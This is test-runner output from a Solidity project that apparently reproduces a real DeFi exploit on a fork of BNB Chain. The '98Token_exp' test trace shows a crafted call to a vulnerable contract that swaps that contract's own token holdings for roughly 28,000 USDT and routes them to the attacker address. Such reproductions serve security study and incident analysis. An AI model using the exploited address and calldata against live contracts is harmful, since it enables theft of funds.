Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.22s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2025-01/98Token_exp.sol:13:5:
   |
13 |     IWBNB WBNB = IWBNB(payable(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c));
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:2436:1:
     |
2436 | interface WBNB {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2025-01/98Token_exp.sol:19:5:
   |
19 |     IERC20 USDT = IERC20(0x55d398326f99059fF775485246999027B3197955);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 781.77ms (1.71ms CPU time)

Ran 1 test for src/test/2025-01/98Token_exp.sol:ContractTest
[PASS] testExploit() (gas: 120611)
Logs:
  [Begin] Attacker USDT before exploit: 0.000000000000000000
  [End] Attacker USDT after exploit: 27995.389614557976722846

Traces:
  [274533] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 45462897 [4.546e7])
    │   └─ ← [Return] 0
    ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26542161622221038197 [2.654e19]
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26542161622221038197 [2.654e19]
    ├─ [0] VM::accesses(0x55d398326f99059fF775485246999027B3197955)
    │   └─ ← [Return] [0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96], []
    ├─ [0] VM::load(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000017058b35e777da275
    ├─ [0] VM::load(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000017058b35e777da275
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26542161622221038197 [2.654e19]
    ├─ [0] VM::store(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000017058b35e777da275)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: 0x55d398326f99059fF775485246999027B3197955, fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 81201235000773904770131445719184449197250777359516868712991521815545917127830 [8.12e76])
    ├─ [0] VM::load(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000017058b35e777da275
    ├─ [0] VM::store(0x55d398326f99059fF775485246999027B3197955, 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [128211] ContractTest::testExploit()
    ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "[Begin] Attacker USDT before exploit", val: 0, decimals: 18)
    ├─ [2670] 0xc0dDfD66420ccd3a337A17dD5D94eb54ab87523F::balanceOf(0xB040D88e61EA79a1289507d56938a6AD9955349C) [staticcall]
    │   └─ ← [Return] 97555900794950304298569411189 [9.755e28]
    ├─ [96917] 0xB040D88e61EA79a1289507d56938a6AD9955349C::81e3516d(000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000013b38598b08849bd14a69aa7500000000000000000000000000000000000000000000000000000000000000000000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000000000000002000000000000000000000000c0ddfd66420ccd3a337a17dd5d94eb54ab87523f00000000000000000000000055d398326f99059ff775485246999027b3197955)
    │   ├─ [92372] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(97555900794950304298569411189 [9.755e28], 0, [0xc0dDfD66420ccd3a337A17dD5D94eb54ab87523F, 0x55d398326f99059fF775485246999027B3197955], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1735969917 [1.735e9])
    │   │   ├─ [15571] 0xc0dDfD66420ccd3a337A17dD5D94eb54ab87523F::transferFrom(0xB040D88e61EA79a1289507d56938a6AD9955349C, 0xa0ad4B45dc432e950f9e62AAA46995CE40ef4a11, 97555900794950304298569411189 [9.755e28])
    │   │   │   ├─ emit Transfer(from: 0xB040D88e61EA79a1289507d56938a6AD9955349C, to: 0xa0ad4B45dc432e950f9e62AAA46995CE40ef4a11, value: 97555900794950304298569411189 [9.755e28])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x250ce2aa11fb5f3e2a09196b719a8a9805d44ad75fdb24978782497571ccb559: 0x00000000000000000000000000000000000000013b38598b08849bd14a69aa75 → 0
    │   │   │   │   @ 0x20517f7ccebc4f3f1583de32d696f4aec198d894a04917c4bd20bb76b89861b8: 0x000000000000000000000000000000000000000001282f73edfd4f5b0dc4b7eb → 0x00000000000000000000000000000000000000013c6088fef681eb2c582e6260
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [2893] 0xa0ad4B45dc432e950f9e62AAA46995CE40ef4a11::getReserves() [staticcall]
    │   │   │   └─ ← [Return] 28098400545846145078795 [2.809e22], 358066132355143794224838635 [3.58e26], 1735958589 [1.735e9]
    │   │   ├─ [670] 0xc0dDfD66420ccd3a337A17dD5D94eb54ab87523F::balanceOf(0xa0ad4B45dc432e950f9e62AAA46995CE40ef4a11) [staticcall]
    │   │   │   └─ ← [Return] 97913966927305448092794249824 [9.791e28]
    │   │   ├─ [62484] 0xa0ad4B45dc432e950f9e62AAA46995CE40ef4a11::swap(27995389614557976722846 [2.799e22], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   ├─ [27971] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 27995389614557976722846 [2.799e22])
    │   │   │   │   ├─ emit Transfer(from: 0xa0ad4B45dc432e950f9e62AAA46995CE40ef4a11, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 27995389614557976722846 [2.799e22])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000005eda213a0826411fd9e
    │   │   │   │   │   @ 0x0135d8f92b25bf5e5fd4ca6863cc536f46735a6e2f8777d97728ed4874e9446e: 0x0000000000000000000000000000000000000000000005f337a3f8bd9984560b → 0x0000000000000000000000000000000000000000000000059590583b3572586d
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0xa0ad4B45dc432e950f9e62AAA46995CE40ef4a11) [staticcall]
    │   │   │   │   └─ ← [Return] 103010931288168355949 [1.03e20]
    │   │   │   ├─ [670] 0xc0dDfD66420ccd3a337A17dD5D94eb54ab87523F::balanceOf(0xa0ad4B45dc432e950f9e62AAA46995CE40ef4a11) [staticcall]
    │   │   │   │   └─ ← [Return] 97913966927305448092794249824 [9.791e28]
    │   │   │   ├─ emit Sync(reserve0: 103010931288168355949 [1.03e20], reserve1: 97913966927305448092794249824 [9.791e28])
    │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 0, amount1In: 97555900794950304298569411189 [9.755e28], amount0Out: 27995389614557976722846 [2.799e22], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 9: 0x0000000000000000000000000002d8038f7279c0e83d65e53974b55ecf456939 → 0x0000000000000000000000000002e092976c872039115233fbe295c1123ee8dd
    │   │   │   │   @ 8: 0x6778a03d000001282f73edfd4f5b0dc4b7eb0000000005f337a3f8bd9984560b → 0x6778cc4100013c6088fef681eb2c582e62600000000000059590583b3572586d
    │   │   │   │   @ 10: 0x00000000000000000000000000000000001907aff9448c292a21f23b5ba2a582 → 0x000000000000000000000000000000000019ea0cdd268bd7d19350dcd28988fe
    │   │   │   └─ ← [Stop]
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 27995389614557976722846 [2.799e22]
    │   │   └─ ← [Stop]
    │   └─ ← [Stop]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 27995389614557976722846 [2.799e22]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker USDT after exploit", val: 27995389614557976722846 [2.799e22], decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 6.20s (3.95s CPU time)

Ran 2 test suites in 7.02s (6.98s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
